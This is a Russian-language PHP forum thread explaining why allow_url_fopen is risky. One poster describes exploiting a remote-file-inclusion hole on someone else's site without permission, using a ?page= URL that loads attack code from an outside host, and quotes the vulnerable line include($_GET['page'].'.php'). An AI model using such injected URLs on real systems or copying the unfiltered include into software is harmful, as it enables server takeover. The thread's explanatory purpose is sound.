Форум PHP

у меня на хостинге стоит allow_url_fopen on и magic_quotes_gpc on
я понимаю почему надо magic_quotes_gpc выключать

но как работает allow_url_fopen ? я читал что
Эта опция позволяет использование врапперов fopen, которые поддерживают работу с URL, в функциях include(), include_once(), require(), require_once().

ну как это происходит на практике, то есть чего нехорошего можно ожидать если не отключить?

На практике эта директива несет ответственность за использование сетевых адресов в файловых функциях. Отключите и нельзя будет использовать http:// в пути к сайту, включите - можно будет. Если ваш код не обращается к удаленным сайтам и к самому себе через http:// можно отключить.

и почему его считают плохим ,что все предлагают в темах его отключить?

Теоретически, если вы формируете путь к файлу динамически, особенно в конструкциях include/require, с использованием информации из GET и POST-параметров, не достаточно фильтруя их, то можно запустить на вашем сервере произвольный PHP-код расположенный на удаленном сервере. Т.е. ситуация потенциально опасна.

Cheops всё правильно говорит. Пару лет назад по собственной инициативе анализировал один сайт со ссылками вида /?page=abcd
Сначала добавил кавычку в надежде на sql-иньекцию... но получил гораздо более крутое сообщение об ошибке — "Warning: main(acbd'.php): failed to open stream: No such file or directory in ...". Дальше быстренько сварганил на бесплатном хостинге сайт и запросил http://example.com/?page=http://example.org/hackscript
Вобщем, он подключился и я получил полный доступ к сайту. В итоге, гуляя по скриптам, увидел в чём проблема: include($_GET['page'].'.php');
Отписал на почту владельцу сайта о баге и забыл. Через пару месяцев вернулся на этот сайт и наблюдал дефейс :) я даже не удивился.

Спасибо познавательно было .